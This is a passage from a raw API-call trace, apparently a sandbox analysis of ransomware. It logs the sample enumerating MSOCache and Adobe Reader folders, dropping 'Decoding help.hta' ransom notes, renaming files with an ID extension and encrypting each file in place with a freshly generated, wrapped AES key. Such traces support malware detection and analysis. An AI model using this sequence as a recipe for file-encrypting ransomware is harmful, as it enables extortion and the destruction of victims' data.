(lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x538 [0042.143] CreateFileMappingA (hFile=0x538, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x53c [0042.144] CryptAcquireContextA (in: phProv=0xac8fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xac8fcec*=0x11519340) returned 1 [0047.408] CryptGenKey (in: hProv=0x11519340, Algid=0x6610, dwFlags=0x1, phKey=0xac8fce8 | out: phKey=0xac8fce8*=0x5d8a90) returned 1 [0047.408] CryptExportKey (in: hKey=0x5d8a90, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xac8fbe4, pdwDataLen=0xac8fce4 | out: pbData=0xac8fbe4*, pdwDataLen=0xac8fce4*=0x2c) returned 1 [0047.408] MapViewOfFile (hFileMappingObject=0x53c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0xf850000 [0047.445] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xac8fbe4*, pdwDataLen=0xac8fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xac8fbe4*, pdwDataLen=0xac8fcf8*=0x100) returned 1 [0047.446] CryptEncrypt (in: hKey=0x5d8a90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xf850000, pdwDataLen=0xac8fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0xf850000*, pdwDataLen=0xac8fce4*=0x100000) returned 1 [0048.543] UnmapViewOfFile (lpBaseAddress=0xf850000) returned 1 [0049.463] CloseHandle (hObject=0x53c) returned 1 [0049.463] CryptDestroyKey (hKey=0x5d8a90) returned 1 [0049.463] CryptReleaseContext (hProv=0x11519340, dwFlags=0x0) returned 1 [0049.463] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0049.463] WriteFile (in: hFile=0x538, lpBuffer=0xac8fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xac8fcf8, lpOverlapped=0x0 | out: lpBuffer=0xac8fbe4*, lpNumberOfBytesWritten=0xac8fcf8*=0x100, lpOverlapped=0x0) returned 1 [0052.061] WriteFile (in: hFile=0x538, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xac8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xac8fcf8*=0x500, lpOverlapped=0x0) returned 1 [0052.614] CloseHandle (hObject=0x538) returned 1 [0053.769] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.429] FindNextFileW (in: hFindFile=0x5d8390, lpFindFileData=0xac8fd30 | out: lpFindFileData=0xac8fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="PublisherMUI.xml", cAlternateFileName="PUBLIS~1.XML")) returned 1 [0058.430] lstrcpyW (in: lpString1=0x1101f668, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*.*" [0058.430] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0058.430] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0058.430] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0058.430] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PublisherMUI.xml") returned -1 [0058.430] lstrlenW (lpString="PublisherMUI.xml") returned 16 [0058.430] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*.*" [0058.430] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0058.430] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\", lpString2="PublisherMUI.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" [0058.430] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" [0058.430] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0058.430] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.431] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc44 [0058.431] CreateFileMappingA (hFile=0xc44, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xc48 [0058.431] CryptAcquireContextA (in: phProv=0xac8fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xac8fcec*=0x2aac6330) returned 1 [0060.216] CryptGenKey (in: hProv=0x2aac6330, Algid=0x6610, dwFlags=0x1, phKey=0xac8fce8 | out: phKey=0xac8fce8*=0x5fca820) returned 1 [0060.217] CryptExportKey (in: hKey=0x5fca820, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xac8fbe4, pdwDataLen=0xac8fce4 | out: pbData=0xac8fbe4*, pdwDataLen=0xac8fce4*=0x2c) returned 1 [0060.217] MapViewOfFile (hFileMappingObject=0xc48, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5a0) returned 0x5640000 Thread: id = 115 os_tid = 0x87c [0040.145] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*", lpFindFileData=0xadcfd30 | out: lpFindFileData=0xadcfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81ed8ae0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a55b0 [0040.145] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.145] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0xadcfd30 | out: lpFindFileData=0xadcfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81ed8ae0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.745] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.745] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.745] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0xadcfd30 | out: lpFindFileData=0xadcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4268, dwReserved0=0x0, dwReserved1=0x0, cFileName="Benioku.htm", cAlternateFileName="")) returned 1 [0041.005] lstrcpyW (in: lpString1=0x109a8940, lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" [0041.005] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned 48 [0041.005] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta" [0041.005] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\decoding help.hta")) returned 0xffffffff [0041.005] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0041.006] WriteFile (in: hFile=0x388, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xadcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xadcfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.007] CloseHandle (hObject=0x388) returned 1 [0041.007] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.007] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Benioku.htm") returned 1 [0041.007] lstrlenW (lpString="Benioku.htm") returned 11 [0041.007] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" [0041.007] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned 48 [0041.007] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", lpString2="Benioku.htm" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm" [0041.007] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm" [0041.008] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm.[ID]g9uZrLhJaygpwRm1[ID]" [0041.008] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\benioku.htm"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\benioku.htm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.021] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\benioku.htm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0041.021] CreateFileMappingA (hFile=0x38c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x390 [0041.021] CryptAcquireContextA (in: phProv=0xadcfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xadcfcec*=0x3448f18) returned 1 [0043.398] CryptGenKey (in: hProv=0x3448f18, Algid=0x6610, dwFlags=0x1, phKey=0xadcfce8 | out: phKey=0xadcfce8*=0x5a5b70) returned 1 [0043.398] CryptExportKey (in: hKey=0x5a5b70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xadcfbe4, pdwDataLen=0xadcfce4 | out: pbData=0xadcfbe4*, pdwDataLen=0xadcfce4*=0x2c) returned 1 [0043.398] MapViewOfFile (hFileMappingObject=0x390, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4260) returned 0xde30000 [0043.437] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xadcfbe4*, pdwDataLen=0xadcfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xadcfbe4*, pdwDataLen=0xadcfcf8*=0x100) returned 1 [0043.437] CryptEncrypt (in: hKey=0x5a5b70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xde30000, pdwDataLen=0xadcfce4*=0x4260, dwBufLen=0x4260 | out: pbData=0xde30000*, pdwDataLen=0xadcfce4*=0x4260) returned 1 [0043.438] UnmapViewOfFile (lpBaseAddress=0xde30000) returned 1 [0043.439] CloseHandle (hObject=0x390) returned 1 [0043.439] CryptDestroyKey (hKey=0x5a5b70) returned 1 [0043.439] CryptReleaseContext (hProv=0x3448f18, dwFlags=0x0) returned 1 [0043.439] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.439] WriteFile (in: hFile=0x38c, lpBuffer=0xadcfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xadcfcf8, lpOverlapped=0x0 | out: lpBuffer=0xadcfbe4*, lpNumberOfBytesWritten=0xadcfcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.440] WriteFile (in: hFile=0x38c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xadcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xadcfcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.440] CloseHandle (hObject=0x38c) returned 1 [0043.441] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.442] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0xadcfd30 | out: lpFindFileData=0xadcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="Berime.htm", cAlternateFileName="")) returned 1 [0043.442] lstrcpyW (in: lpString1=0x10bbe4b8, lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" [0043.442] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned 48 [0043.442] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta" [0043.442] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\decoding help.hta")) returned 0x1 [0043.442] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Berime.htm") returned 1 [0043.442] lstrlenW (lpString="Berime.htm") returned 10 [0043.442] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" [0043.442] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned 48 [0043.442] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", lpString2="Berime.htm" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm" [0043.442] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm" [0043.442] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm.[ID]g9uZrLhJaygpwRm1[ID]" [0043.442] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\berime.htm"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\berime.htm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.454] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\berime.htm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0043.454] CreateFileMappingA (hFile=0x38c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x390 [0043.454] CryptAcquireContextA (in: phProv=0xadcfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xadcfcec*=0x3449028) returned 1 [0043.455] CryptGenKey (in: hProv=0x3449028, Algid=0x6610, dwFlags=0x1, phKey=0xadcfce8 | out: phKey=0xadcfce8*=0x671db0) returned 1 [0043.455] CryptExportKey (in: hKey=0x671db0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xadcfbe4, pdwDataLen=0xadcfce4 | out: pbData=0xadcfbe4*, pdwDataLen=0xadcfce4*=0x2c) returned 1 [0043.455] MapViewOfFile (hFileMappingObject=0x390, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x42a0) returned 0x44a0000 [0043.476] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xadcfbe4*, pdwDataLen=0xadcfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xadcfbe4*, pdwDataLen=0xadcfcf8*=0x100) returned 1 [0043.476] CryptEncrypt (in: hKey=0x671db0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x44a0000, pdwDataLen=0xadcfce4*=0x42a0, dwBufLen=0x42a0 | out: pbData=0x44a0000*, pdwDataLen=0xadcfce4*=0x42a0) returned 1 [0043.476] UnmapViewOfFile (lpBaseAddress=0x44a0000) returned 1 [0043.478] CloseHandle (hObject=0x390) returned 1 [0043.478] CryptDestroyKey (hKey=0x671db0) returned 1 [0043.478] CryptReleaseContext (hProv=0x3449028, dwFlags=0x0) returned 1 [0043.478] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.478] WriteFile (in: hFile=0x38c, lpBuffer=0xadcfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xadcfcf8, lpOverlapped=0x0 | out: lpBuffer=0xadcfbe4*, lpNumberOfBytesWritten=0xadcfcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.479] WriteFile (in: hFile=0x38c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xadcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xadcfcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.479] CloseHandle (hObject=0x38c) returned 1 [0043.480] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.480] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0xadcfd30 | out: lpFindFileData=0xadcfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffe6ce0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ffe6ce0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Esl", cAlternateFileName="")) returned 1 [0043.480] lstrcmpW (lpString1=".", lpString2="Esl") returned -1 [0043.480] lstrcmpW (lpString1="..", lpString2="Esl") returned -1 [0043.480] lstrcmpiW (lpString1="windows", lpString2="Esl") returned 1 [0043.481] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" [0043.481] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned 48 [0043.481] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", lpString2="Esl" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl" [0043.481] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\*.*" [0043.481] GlobalMemoryStatus (in: lpBuffer=0xadcfd10 | out: lpBuffer=0xadcfd10) [0043.481] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f48f50, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x38c [0043.494] CloseHandle (hObject=0x38c) returned 1 [0043.494] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0xadcfd30 | out: lpFindFileData=0xadcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d67db00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9d67db00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4288, dwReserved0=0x0, dwReserved1=0x0, cFileName="IrakHau.htm", cAlternateFileName="")) returned 1 [0043.495] lstrcpyW (in: lpString1=0x10bbe4b8, 